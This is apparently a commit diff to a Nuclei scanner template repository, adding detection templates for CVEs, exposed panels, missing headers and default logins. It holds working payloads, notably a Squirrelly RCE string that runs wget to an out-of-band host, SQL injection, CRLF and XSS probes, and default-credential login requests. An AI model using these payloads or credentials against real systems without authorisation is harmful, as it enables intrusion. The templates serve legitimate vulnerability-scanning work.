description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
reference:
- https://github.com/ssst0n3/CVE-2021-31856
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
tags: sqli,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
matchers-condition: and
matchers:
- type: word
words:
- "709b38b27304df6257a86a60df742c4c"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: CVE-2021-32819
info:
name: Nodejs squirrelly template engine RCE
author: pikpikcu
severity: critical
description: |
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
- https://www.linuxlz.com/aqld/2331.html
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
tags: cve,cve2021,nodejs,rce,oob
requests:
- method: GET
path:
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,23 @@
id: CVE-2021-34370
info:
name: Accela Civic Platform 21.1 - Open Redirect & XSS
author: 0x_Akoko
severity: medium
description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
reference:
- https://www.exploit-db.com/exploits/49990
- https://nvd.nist.gov/vuln/detail/CVE-2021-34370
- https://www.accela.com/civic-platform/
tags: xss,redirect,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -0,0 +1,65 @@
id: cs141-default-login
info:
name: CS141 SNMP Module Default Credentials
author: socketz
severity: medium
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
requests:
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"admin","password":"cs141-snmp"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"engineer","password":"engineer"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"guest","password":"guest"}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'accessToken'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- accessToken

View File

@ -50,7 +50,7 @@ requests:
- password
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,54 @@
id: vidyo-default-credentials
info:
name: Vidyo Default Credentials
author: izn0u
severity: medium
description: test for default cred super:password
reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
tags: vidyo,default-login
requests:
- raw:
- |
GET /super/login.html?lang=en HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{RootURL}}/super/login.html?lang=en
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
username=super&password=password
extractors:
- type: regex
name: csrf_tkn
group: 1
part: body
internal: true
regex:
- 'csrf_tkn=([A-Za-z0-9.-]+)'
- type: kval
name: session
internal: true
part: header
kval:
- JSESSIONID
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/super/index.html"
- type: status
status:
- 302

View File

@ -0,0 +1,28 @@
id: wso2-management-console-default-password
info:
name: WSO2 Management Console Default Password
author: cocxanh
severity: high
reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
tags: default-login,wso2
requests:
- raw:
- |
POST /carbon/admin/login_action.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 29
username=admin&password=admin
redirects: false
matchers:
- type: word
words:
- "/carbon/admin/index.jsp?loginStatus=true"
- "JSESSIONID"
part: header
condition: and

View File

@ -22,6 +22,7 @@ requests:
- '{{BaseURL}}/sql.php'
- '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -1,11 +1,11 @@
id: cisco-security-details
id: cisco-meraki-exposure
info:
name: Cisco Meraki cloud & Security Appliance details
author: dhiyaneshDK
name: Cisco Meraki cloud & security Appliances Information Disclosure
author: dhiyaneshDK,r3naissance
severity: info
reference: https://www.exploit-db.com/ghdb/6708
tags: panel,cisco
tags: panel,cisco,meraki,disclosure
requests:
- method: GET
@ -17,6 +17,9 @@ requests:
- type: word
words:
- 'Your client connection'
- 'This security appliance is directly connected to a local network'
condition: and
- type: status
status:
- 200

View File

@ -13,7 +13,13 @@ requests:
- '{{BaseURL}}/dbconsole/'
- '{{BaseURL}}/h2-console/'
matchers-condition: and
matchers:
- type: word
words:
- "<title>H2 Console</title>"
- type: word
words:
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
negative: true

View File

@ -13,6 +13,7 @@ requests:
- "{{BaseURL}}/jira/secure/Dashboard.jspa"
- "{{BaseURL}}/login.jsp"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers:

View File

@ -22,10 +22,12 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/"
- "{{BaseURL}}/phpMyAdmin/"
stop-at-first-match: true
matchers:
- type: word
words:
- "<title>phpMyAdmin"
- "pmahomme"
extractors:
- type: regex

View File

@ -14,6 +14,8 @@ requests:
- '{{BaseURL}}/zp/zp-core/setup/index.php'
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
- '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
stop-at-first-match: true
matchers:
- type: word
words:

View File

@ -14,6 +14,7 @@ requests:
- '{{BaseURL}}/sphider/admin/admin.php'
- '{{BaseURL}}/search/admin/admin.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -51,6 +51,7 @@ requests:
- "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
- "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -17,26 +17,27 @@ requests:
- "{{BaseURL}}/api/application.wadl"
- "{{BaseURL}}/api/v1/application.wadl"
- "{{BaseURL}}/api/v2/application.wadl"
stop-at-first-match: true
matchers:
- name: http-get
type: word
words:
- "This is simplified WADL with user and core resources only"
- "\"http://jersey.java.net/\""
- "http://jersey.java.net"
- "http://wadl.dev.java.net/2009/02"
condition: or
part: body
- method: OPTIONS
path:
- "{{BaseURL}}"
- "{{BaseURL}}/api/v1"
- "{{BaseURL}}/api/v2"
stop-at-first-match: true
matchers:
- name: http-options
type: word
words:
- "This is simplified WADL with user and core resources only"
- "\"http://jersey.java.net/\""
- "http://jersey.java.net"
- "http://wadl.dev.java.net/2009/02"
condition: or
part: body

View File

@ -24,3 +24,7 @@ requests:
words:
- "application/octet-stream"
part: header
- type: dsl
dsl:
- 'len(body) > 2'

View File

@ -19,6 +19,7 @@ requests:
- "{{BaseURL}}/docker-compose-dev.yml"
- "{{BaseURL}}/docker-compose.override.yml"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl

View File

@ -22,8 +22,8 @@ requests:
- '{{BaseURL}}/events../.git/config'
- '{{BaseURL}}/media../.git/config'
- '{{BaseURL}}/lib../.git/config'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
stop-at-first-match: true
matchers:
- type: word
words:

View File

@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
- "{{BaseURL}}/happyaxis.jsp"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -29,6 +29,7 @@ requests:
- '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)'
- '(?i)(!native)|(.*keybindings)'
- '(?i)(layout|a)key'
- '(?i)token_expires_in'
condition: or
negative: true

View File

@ -25,7 +25,7 @@ requests:
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -18,8 +18,9 @@ requests:
header: helpers/payloads/request-headers.txt
payload: helpers/payloads/command-injection.txt
attack: clusterbomb
redirects: true
redirects: true
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word

View File

@ -22,7 +22,7 @@ requests:
attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true
matchers-condition: and
matchers:
- type: binary

View File

@ -22,7 +22,7 @@ requests:
passwords: helpers/wordlists/wp-passwords.txt
threads: 50
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/a.htaccess"
- "{{BaseURL}}/htaccess_for_page_not_found_redirects.htaccess"
stop-at-first-match: true
matchers:
- type: word
words:

View File

@ -1,17 +0,0 @@
id: missing-csp
info:
name: CSP Not Enforced
author: geeknik
severity: info
description: Checks if there is a CSP header
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''content-security-policy'')'

View File

@ -1,17 +0,0 @@
id: missing-hsts
info:
name: Strict Transport Security Not Enforced
author: Dawid Czarnecki
severity: info
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''strict-transport-security'')'

View File

@ -1,18 +0,0 @@
id: missing-x-content-type-options
info:
name: X-Content-Type-Options unidentified
author: G4L1T0 and @convisoappsec
severity: info
description: Check for X-Content-Type-Options header
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''x-content-type-options'')'

View File

@ -1,19 +0,0 @@
id: missing-x-frame-options
info:
name: Clickjacking (Missing XFO header)
author: kurohost
severity: low
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'x-frame-options')"

View File

@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -20,6 +20,7 @@ requests:
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -66,6 +66,8 @@ requests:
- '{{BaseURL}}///etc.children.json/FNZ.html'
- '{{BaseURL}}///etc.children.json/FNZ.png'
- '{{BaseURL}}///etc.children.json/FNZ.ico'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -13,9 +13,8 @@ requests:
- "{{BaseURL}}/views/ajax/autocomplete/user/a"
- "{{BaseURL}}/?q=admin/views/ajax/autocomplete/user/a"
- "{{BaseURL}}/?q=views/ajax/autocomplete/user/a"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -13,17 +13,19 @@ requests:
- "{{BaseURL}}/user/1"
- "{{BaseURL}}/user/2"
- "{{BaseURL}}/user/3"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
part: header
- type: status
status:
- 301
extractors:
- type: regex
part: header

View File

@ -0,0 +1,127 @@
id: http-missing-security-headers
info:
name: HTTP Missing Security Headers
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
severity: info
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
tags: misconfig,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: regex
name: strict-transport-security
regex:
- "(?i)strict-transport-security"
negative: true
part: header
- type: regex
name: content-security-policy
regex:
- "(?i)content-security-policy"
negative: true
part: header
- type: regex
name: x-frame-options
regex:
- "(?i)x-frame-options"
negative: true
part: header
- type: regex
name: x-content-type-options
regex:
- "(?i)x-content-type-options"
negative: true
part: header
- type: regex
name: x-permitted-cross-domain-policies
regex:
- "(?i)x-permitted-cross-domain-policies"
negative: true
part: header
- type: regex
name: referrer-policy
regex:
- "(?i)referrer-policy"
negative: true
part: header
- type: regex
name: clear-site-data
regex:
- "(?i)clear-site-data"
negative: true
part: header
- type: regex
name: cross-origin-embedder-policy
regex:
- "(?i)cross-origin-embedder-policy"
negative: true
part: header
- type: regex
name: cross-origin-opener-policy
regex:
- "(?i)cross-origin-opener-policy"
negative: true
part: header
- type: regex
name: cross-origin-resource-policy
regex:
- "(?i)cross-origin-resource-policy"
negative: true
part: header
- type: regex
name: access-control-allow-origin
regex:
- "(?i)access-control-allow-origin"
negative: true
part: header
- type: regex
name: access-control-allow-credentials
regex:
- "(?i)access-control-allow-credentials"
negative: true
part: header
- type: regex
name: access-control-expose-headers
regex:
- "(?i)access-control-expose-headers"
negative: true
part: header
- type: regex
name: access-control-max-age
regex:
- "(?i)access-control-max-age"
negative: true
part: header
- type: regex
name: access-control-allow-methods
regex:
- "(?i)access-control-allow-methods"
negative: true
part: header
- type: regex
name: access-control-allow-headers
regex:
- "(?i)access-control-allow-headers"

View File

@ -0,0 +1,29 @@
id: kubernetes-metrics
info:
name: Detect Kubernetes Exposed Metrics
author: pussycat0x
severity: low
description: Information Disclosure of Garbage Collection
tags: kubernetes,exposure,devops
reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- "namespace"
- "HELP"
- "TYPE"
- "kube"
- type: status
status:
- 200

View File

@ -13,16 +13,18 @@ requests:
path:
- '{{BaseURL}}/pods'
- '{{BaseURL}}/api/v1/pods'
matchers-condition: and
matchers:
- type: word
words:
- "apiVersion"
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: kubernetes-resource-report
info:
name: Detect Overview Kubernetes Resource Report
author: pussycat0x
severity: medium
description: Information Disclosure of Kubernetes Resource Report
tags: kubernetes,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Overview - Kubernetes Resource Report"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: node-exporter-metrics
info:
name: Detect Node Exporter Metrics
author: pussycat0x
severity: low
description: Information Disclosure of Garbage Collection
tags: node,exposure,debug
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "node_cooling_device"
- "node_network"
condition: and
- type: status
status:
- 200

View File

@ -2,31 +2,39 @@ id: php_errors
info:
name: PHP errors
author: w4cky_
author: w4cky_,geeknik
severity: info
tags: debug
tags: debug,php
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Fatal error"
- "Call to undefined method"
- "You have an error in your SQL syntax;"
- "MySQL server version for the right syntax to use near"
- "PHP Warning"
- "PHP Error"
- "Warning: mysql_connect():"
- "Warning: mysql_query()"
- "Warning: pg_connect():"
- "failed to open stream: HTTP request failed"
- "SAFE MODE Restriction in effect."
- "Cannot modify header information"
- "ORA-00921: unexpected end of SQL command"
- "ORA-00933: SQL command not properly ended"
- "ORA-00936: missing expression"
- "ORA-12541: TNS:no listener"
extractors:
- type: regex
regex:
- '(?i)Fatal error'
- '(?i)Call to undefined method'
- '(?i)You have an error in your SQL syntax'
- '(?i)MySQL server version for the right syntax to use near'
- '(?i)MySQL cannot create a temporary file'
- '(?i)PHP (Warning|Error)'
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
- '(?i)failed to open stream\:'
- '(?i)SAFE MODE Restriction in effect'
- '(?i)Cannot modify header information'
- '(?i)ORA-00921\: unexpected end of SQL command'
- '(?i)ORA-00933\: SQL command not properly ended'
- '(?i)ORA-00936\: missing expression'
- '(?i)ORA-12541\: TNS\:no listener'
- '(?i)uncaught exception'
- '(?i)include_path'
- '(?i)undefined index'
- '(?i)undefined variable\:'
- '(?i)stack trace\:'
- '(?i)expects parameter [0-9]*'
- '(?i)Debug Trace'
- '(?i)(syntax|parse) error'
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
- '(?i)Maximum execution time of \d* seconds exceeded'

View File

@ -1,8 +1,8 @@
id: unauthenticated-mongo-express.yaml
id: unauthenticated-mongo-express
info:
name: Mongo Express Unauthenticated
author: dhiyaneshDK
author: dhiyaneshDK,b0rn2r00t
severity: high
reference: https://www.exploit-db.com/ghdb/5684
tags: mongo,unauth
@ -12,12 +12,15 @@ requests:
path:
- '{{BaseURL}}'
- '{{BaseURL}}/mongo-express/'
- '{{BaseURL}}/db/admin/system.users'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Home - Mongo Express</title>'
- '<title>system.users - Mongo Express</title>'
condition: or
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: abyss-web-server
info:
name: Detect Abyss Web Server
author: pussycat0x
severity: info
tags: tech
additional-fields:
fofa-dork: 'app="Abyss-Web-Server"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Welcome to Abyss Web Server"
- type: status
status:
- 200

View File

@ -0,0 +1,62 @@
id: adobe-coldfusion-detector
info:
name: Adobe ColdFusion Detector
author: philippedelteil
severity: info
description: With this template we can detect the version number of Coldfusion instances based on their logos.
tags: adobe,coldfusion
requests:
- method: GET
path:
- "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
- "{{BaseURL}}/cfide/administrator/images/mx_login.gif"
- "{{BaseURL}}/CFIDE/administrator/images/background.jpg"
- "{{BaseURL}}/cfide/administrator/images/background.jpg"
- "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
- "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
redirects: true
stop-at-first-match: true
max-redirects: 2
matchers:
- type: dsl
name: "coldfusion-8"
dsl:
- "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))"
- type: dsl
name: "coldfusion-9"
dsl:
- "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))"
- type: dsl
name: "coldfusion-10"
dsl:
- "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))"
- type: dsl
name: "coldfusion-11"
dsl:
- "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))"
- type: dsl
name: "coldfusion-2016"
dsl:
- "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))"
- type: dsl
name: "coldfusion-2021"
dsl:
- "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))"
- type: dsl
name: "coldfusion-2018"
dsl:
- "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))"
- type: dsl
name: "coldfusion-mx-7"
dsl:
- "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"

View File

@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/axis2/"
- "{{BaseURL}}/axis/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -0,0 +1,28 @@
id: craft-cms-detect
info:
name: Craft CMS Detect
author: skeltavik
severity: info
description: Detects Craft CMS
reference: https://craftcms.com
tags: tech,craftcms
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'X-Powered-By: Craft CMS'
- type: regex
part: header
regex:
- 'Set-Cookie: (Craft|CRAFT)'

View File

@ -52,6 +52,7 @@ requests:
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,25 @@
id: kubernetes-enterprise-manager
info:
name: Detect Kubernetes Enterprise Manager
author: pussycat0x
severity: info
tags: tech,kubernetes
additional-fields:
fofa-dork: 'app="Kubernetes-Enterprise-Manager"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Kubernetes Enterprise Manager"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: kubernetes-mirantis
info:
name: Detect Mirantis Kubernetes Engine
author: pussycat0x
severity: info
tags: tech,kubernetes
additional-fields:
fofa-dork: 'app="Mirantis-Kubernetes-Engine"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Mirantis Kubernetes Engine"
- type: status
status:
- 200

View File

@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/iNotes/Forms85.nsf"
- "{{BaseURL}}/iNotes/Forms9.nsf"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -29,6 +29,7 @@ requests:
- "{{BaseURL}}/openam/json/serverinfo/*"
redirects: true
stop-at-first-match: true
max-redirects: 2
matchers-condition: and
matchers:

View File

@ -0,0 +1,25 @@
id: oracle-iplanet-web-server
info:
name: Detect Oracle-iPlanet-Web-Server
author: pussycat0x
severity: info
tags: tech,oracle
additional-fields:
fofa-dork: 'app="Oracle-iPlanet-Web-Server'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Oracle iPlanet Web Server"
- type: status
status:
- 200

View File

@ -29,6 +29,7 @@ requests:
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -20,6 +20,7 @@ requests:
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
stop-at-first-match: true
matchers:
- type: regex
regex:

Some files were not shown because too many files have changed in this diff Show More